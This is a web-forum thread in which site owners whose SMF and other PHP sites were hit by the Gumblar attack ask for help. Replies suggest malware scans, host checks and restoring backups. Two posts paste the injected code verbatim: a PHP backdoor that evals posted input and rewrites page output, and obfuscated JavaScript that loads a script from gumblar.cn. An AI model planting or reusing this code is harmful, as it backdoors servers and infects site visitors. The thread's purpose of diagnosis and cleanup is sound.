Topic: gumblar.cn hack hit my SMF installation

[iago23]

Code keeps getting inserted into my SMF installation (as well as any other PHP, HTML, JS files).

Here's what I've done to prevent things in addition to upgrading to the latest 1.x SMF:

- Ran rkhunter to confirm that the site hasn't been root-hacked. It hasn't
been.
- Upgraded PHP and Apache to the latest stable version of PHP.
- chmodded the files to be read-only, no write.
- Changed my admin password in the SMF software
- Scrambled my passwords for command line and root (that said, no indications
exist that someone other than me is logging into either account)

Here's what still happened after I did all of the above:

The following PHP code has been injected into my PHP scripts at least 3 times
in the past two weeks.  Latest was around 7am server time this morning (more
below the excerpt):

<?php
if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eva
l($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',bas
e64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBX
MW1yZD0nJSc7dmFyIFZrdj11bmVzY2FwZSgoJ3ZhckAyMGFAM2RAMjJTY3JpQDcwdEA0NUA2ZWdANjlu
ZUAyMkAyY2JAM2RAMjJWZXJzaUA2Zm4oQDI5K0AyMkAyY0A2YUAzZEAyMkAyMkAyY0A3NUAzZG5hdkA2
OUA2N2F0b3JAMmV1c2VyQWdlbnRAM2JpZigodUAyZWluZEA2NXhANGZmKEAyMldpbkAyMkAyOUAzZTBA
MjlAMjZAMjYoQDc1QDJlaUA2ZWRleE9mQDI4QDIyTlRAMjBAMzZAMjIpQDNjMClAMjZAMjZAMjhkb2N1
QDZkZW50QDJlY29va2llQDJlQDY5QDZlQDY0ZXhPZihAMjJtQDY5ZWtAM2QxQDIyKUAzY0AzMClAMjZA
MjYodHlANzBlb2YoQDdhckA3Nnp0QDczQDI5QDIxQDNkQDc0QDc5cGVvZihAMjJBQDIyKSkpQDdienJ2
enRANzNAM2RAMjJANDFAMjJAM2JANjVANzZANjFsQDI4QDIyaWYod0A2OUA2ZWRvQDc3QDJlQDIyK2Er
QDIyKUA2YUAzZGorQDIyK2ErQDIyQDRkQDYxQDZhb0A3MkAyMkAyYmJAMmJhK0AyMk1pbm9yQDIyK0A2
MitANjErQDIyQDQydWlsZEAyMitiQDJiQDIyakAzYkAyMkAyOUAzYmRANmZjQDc1bWVudEAyZXdyQDY5
dEA2NShAMjJAM2NzQDYzckA2OXBANzRAMjBzQDcyY0AzZEAyZkAyZmd1bWJsYUA3MkAyZWNuQDJmckA3
M3NAMmZAM2ZANjlkQDNkQDIyK2orQDIyQDNlQDNjQDVjQDJmc2NyaXB0QDNlQDIyKUAzYkA3ZCcpLnJl
cGxhY2UoL0AvZyxXMW1yZCkpO2V2YWwoVmt2KX0pKCk7CiAtLT48L3NjcmlwdD4='));function
tmp
_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10
,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0]
as $v)i
f(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30
,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v
)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_re
place($v,'',$s);}$s1=preg_replace('#<script language=javascript><!--
\ndocument\
.write\(unescape\(.+?\n
--></script>#','',$s);if(stristr($s,'<body'))$s=preg_rep
lace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</bod
y')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return
$g?gzencode($s):$s;}funct
ion
tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'
])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1)
 as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default
ou
tput
handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents
();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start
($s[$i][0]);echo
$s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_
lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

This gets inserted into HTML files:

<script language=javascript><script language=javascript><!--
(function(){var W1mrd='%';var
Vkv=unescape(('var@20a@3d@22Scri@70t@45@6eg@69ne@2
2@2cb@3d@22Versi@6fn(@29+@22@2c@6a@3d@22@22@2c@75@3dnav@69@67ator@2euserAgent@3b
if((u@2eind@65x@4ff(@22Win@22@29@3e0@29@26@26(@75@2ei@6edexOf@28@22NT@20@36@22)@
3c0)@26@26@28docu@6dent@2ecookie@2e@69@6e@64exOf(@22m@69ek@3d1@22)@3c@30)@26@26(
ty@70eof(@7ar@76zt@73@29@21@3d@74@79peof(@22A@22)))@7bzrvzt@73@3d@22@41@22@3b@65
@76@61l@28@22if(w@69@6edo@77@2e@22+a+@22)@6a@3dj+@22+a+@22@4d@61@6ao@72@22@2bb@2
ba+@22Minor@22+@62+@61+@22@42uild@22+b@2b@22j@3b@22@29@3bd@6fc@75ment@2ewr@69t@6
5(@22@3cs@63r@69p@74@20s@72c@3d@2f@2fgumbla@72@2ecn@2fr@73s@2f@3f@69d@3d@22+j+@2
2@3e@3c@5c@2fscript@3e@22)@3b@7d').replace(/@/g,W1mrd));eval(Vkv)})();
 --></script>

A very similar chunk of code as the above gets inserted into JS files.

Anyone have thoughts on what steps to take beyond what I've done already?

Here's some stuff that's been reported about this intrusion elsewhere:
http://forums.nasioc.com/forums/showthread.php?p=26537579 [nofollow]
http://stackoverflow.com/questions/810402/virus-in-php/818935 [nofollow]

Short of ditching everything and finding a new hosting provider, I'm not sure I see anything in the above I haven't done...

Thoughts?

[MrPhil]

Are all PCs used to administer the site regularly scanned for viruses and spyware? If you've got a password sniffer or a keystroke logger on your PC, the hacker has the keys to the kingdom, and nothing you do on the server side is going to help. You also need a firewall on the PC if you don't have one.

[iago23]

Are all PCs used to administer the site regularly scanned for viruses and spyware? If you've got a password sniffer or a keystroke logger on your PC, the hacker has the keys to the kingdom, and nothing you do on the server side is going to help. You also need a firewall on the PC if you don't have one.

Yep, I'm covered on that front. I've been running with current virus protection software for a while now on the only PC I use to get into the site -- and there are other sites on other machines that I administer which have not been affected at all, which would indicate it's less likely to be a problem sourced from my PC.

[Informatics]

The problem is on the .CN domain, i've heard that all domain with .CN will be injected by malicious codes.

I don't know why... its on the domain root, not your hosting.

[iago23]

The problem is on the .CN domain, i've heard that all domain with .CN will be injected by malicious codes.

I don't know why... its on the domain root, not your hosting.

I think you misunderstand -- my site isn't in the .cn domain; the injected code (once de-obfuscated) tries to do something *with* a site with one of those domains. But mine is a standard .com.

[Informatics]

Ups... i'm sorry.
Do you install it manually or using some scripts like fantastico?

Do you use any theme other that default theme?

[iago23]

Ups... i'm sorry.
Do you install it manually or using some scripts like fantastico?

Do you use any theme other that default theme?

Installed it myself, and I'm using the default.

[Informatics]

Any mods installed? what is it?

[lipctech]

I got hit yesterday too.  My site now runs really slow.

hxxp:www.cablerant.com [nonactive]

[lipctech]

I use 1and1.com as my provider if that matters.

[nicejoin]

Hi iago, I've got the same problem.
All my web were injected by that script, both html and php.
Some can be deleted, but the rest cannot, especially on sites using CMS. I'm frustrated not know what to do.

[lipctech]

Something is going on.
There may be a problem with SMF.
Three users have the same problem.

[Informatics]

Ever read about IFRAME INJECTION?

i just read it here: http://www.widianto.org/2009/05/05/iframe-injection/

You can use webpage translator, its use Indonesian language.

Thanx.

[nicejoin]

Something is going on.
There may be a problem with SMF.
Three users have the same problem.

Not really the SMF. I also have other sites using PHPBB, wordpress and oscommerce. All were contaminated. They are hosted in three different hosting company.
The injected script on html /php (without dbase) are easy to delete but not the ones using CMS.

[Urbanite]

Sadly I too have been hit by this shell script and within days it had done considerable damage, the feedback from the site host was:-
 
 
Some of the shells dated back as far as Jan 25 2008 however others were added more recently (May 3).
Using any one of these shells the intruder(s) would have full access to modify any files under the account, and they took advantage of this access to add base 64 encoded javascript code to 225 files yesterday.
 
 
My site host restored from a recent backup and found 9 shells within the backup, these were ‘killed’ and all went well for a day then it came back, its being worked on at the moment it looks like something got through the first scan by the site host, I’ll let you know how things go.

[stevefdl]

My website has been hacked with this code. It is right after the </head>...any idea how to remove it?

<script language=javascript><!--
(function(){var FopJ='var#20a#3d#22Scr#69p#74#45#6e#67in#65#22#2cb#3d#22Ve#72si#6f#6e(#29+#22#2c#6a#3d#22#22#2c#75#3dn#61vig#61tor#2euserAgent#3b#69f((u#2ein#64exOf(#22Win#22)#3e0)#26#26(u#2ein#64#65xOf(#22NT#206#22)#3c0#29#26#26(documen#74#2ecoo#6b#69e#2e#69ndexO#66(#22mi#65k#3d1#22)#3c#30)#26#26#28typ#65of(zrv#7at#73)#21#3dty#70#65of#28#22A#22)))#7bzr#76zts#3d#22#41#22#3be#76al(#22i#66#28window#2e#22+a#2b#22)j#3dj#2b#22+#61+#22#4dajor#22#2b#62#2ba+#22M#69#6eor#22#2b#62+a#2b#22Bu#69ld#22+b+#22#6a#3b#22)#3bdoc#75me#6et#2ewrite(#22#3cscript#20src#3d#2f#2fgu#6dblar#2ec#6e#2f#72s#73#2f#3fid#3d#22#2bj#2b#22#3e#3c#5c#2fscr#69pt#3e#22)#3b#7d';var uy5=FopJ.replace(/#/g,'%');var Bsiy=unescape(uy5);eval(Bsiy)})();
 --></script>

[greyknight17]

Everyone having this problem, can ask their webhost to look into why this is happening. It's usually a security hole on the webserver.

stevefdl, there is usually multiple files infected. So unless you want to go through each and every file you have, I recommend using a backup (either your own or ask your host). To fix it, all you have to do is remove the code injected.

[governer45]

The problem is on the .CN domain, i've heard that all domain with.

[governer45]

 1)Ever read about IFRAME INJECTION?